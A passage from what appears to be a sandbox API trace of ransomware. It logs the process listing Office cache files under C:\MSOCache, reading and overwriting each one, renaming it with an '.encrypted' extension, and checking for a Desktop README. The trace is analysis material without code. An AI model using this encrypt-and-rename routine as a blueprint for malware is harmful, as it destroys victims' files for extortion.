ftLastWriteTime.dwLowDateTime=0x6bf33480, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0225.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0225.493] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0225.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0225.494] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0225.494] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0225.494] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0cb0 [0225.498] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0225.498] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0225.499] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0225.499] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0225.499] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0225.499] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0225.499] FindClose (in: hFindFile=0x94f0cb0 | out: hFindFile=0x94f0cb0) returned 1 [0225.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0225.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0225.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0225.501] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0225.501] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0225.501] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0cb0 [0225.502] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0225.502] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0225.502] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0225.503] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0225.503] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0225.503] FindNextFileW (in: hFindFile=0x94f0cb0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0225.503] FindClose (in: hFindFile=0x94f0cb0 | out: hFindFile=0x94f0cb0) returned 1 [0225.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0225.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0225.504] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0225.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0225.505] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0225.507] GetFileType (hFile=0x280) returned 0x1 [0225.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0225.507] GetFileType (hFile=0x280) returned 0x1 [0225.507] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x5ac [0225.507] ReadFile (in: hFile=0x280, lpBuffer=0x22a01cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22a01cc*, lpNumberOfBytesRead=0x2ee7d4*=0x5ac, lpOverlapped=0x0) returned 1 [0225.509] CloseHandle (hObject=0x280) returned 1 [0225.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0225.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0225.534] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0225.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0225.535] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0225.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0225.535] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0225.536] GetFileType (hFile=0x280) returned 0x1 [0225.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0225.537] GetFileType (hFile=0x280) returned 0x1 [0225.537] WriteFile (in: hFile=0x280, lpBuffer=0x22efe58*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x22efe58*, lpNumberOfBytesWritten=0x2ee798*=0x5b0, lpOverlapped=0x0) returned 1 [0225.538] CloseHandle (hObject=0x280) returned 1 [0225.539] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0225.539] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.encrypted", lpFilePart=0x0) returned 0x57 [0225.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0225.539] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0x6bfa58a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5b0)) returned 1 [0225.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0225.539] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.encrypted")) returned 1 [0225.540] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpFilePart=0x0) returned 0x49 [0225.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0225.540] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0225.541] GetFileType (hFile=0x280) returned 0x1 [0225.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0225.542] GetFileType (hFile=0x280) returned 0x1 [0225.542] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x7e1dcd [0225.578] ReadFile (in: hFile=0x280, lpBuffer=0x32054d0, nNumberOfBytesToRead=0x7e1dcd, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x32054d0*, lpNumberOfBytesRead=0x2ee7d4*=0x7e1dcd, lpOverlapped=0x0) returned 1 [0226.055] CloseHandle (hObject=0x280) returned 1 [0226.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0226.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0226.902] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0226.902] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpFilePart=0x0) returned 0x49 [0226.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0226.902] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0226.914] GetFileType (hFile=0x280) returned 0x1 [0226.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0226.914] GetFileType (hFile=0x280) returned 0x1 [0226.914] WriteFile (in: hFile=0x280, lpBuffer=0xa5f6e28*, nNumberOfBytesToWrite=0x7e1dd0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0xa5f6e28*, lpNumberOfBytesWritten=0x2ee7c4*=0x7e1dd0, lpOverlapped=0x0) returned 1 [0227.121] CloseHandle (hObject=0x280) returned 1 [0227.121] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpFilePart=0x0) returned 0x49 [0227.121] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.encrypted", lpFilePart=0x0) returned 0x53 [0227.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0227.121] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0x6ceac380, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dd0)) returned 1 [0227.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0227.122] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.encrypted")) returned 1 [0227.123] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0227.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0227.123] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0227.124] GetFileType (hFile=0x280) returned 0x1 [0227.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0227.124] GetFileType (hFile=0x280) returned 0x1 [0227.124] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x750 [0227.124] ReadFile (in: hFile=0x280, lpBuffer=0x233ec64, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x233ec64*, lpNumberOfBytesRead=0x2ee7d4*=0x750, lpOverlapped=0x0) returned 1 [0227.126] CloseHandle (hObject=0x280) returned 1 [0227.146] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0227.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0227.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0227.147] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0227.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0227.147] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0227.148] GetFileType (hFile=0x280) returned 0x1 [0227.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0227.148] GetFileType (hFile=0x280) returned 0x1 [0227.148] WriteFile (in: hFile=0x280, lpBuffer=0x238f158*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x238f158*, lpNumberOfBytesWritten=0x2ee798*=0x760, lpOverlapped=0x0) returned 1 [0227.149] CloseHandle (hObject=0x280) returned 1 [0227.150] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 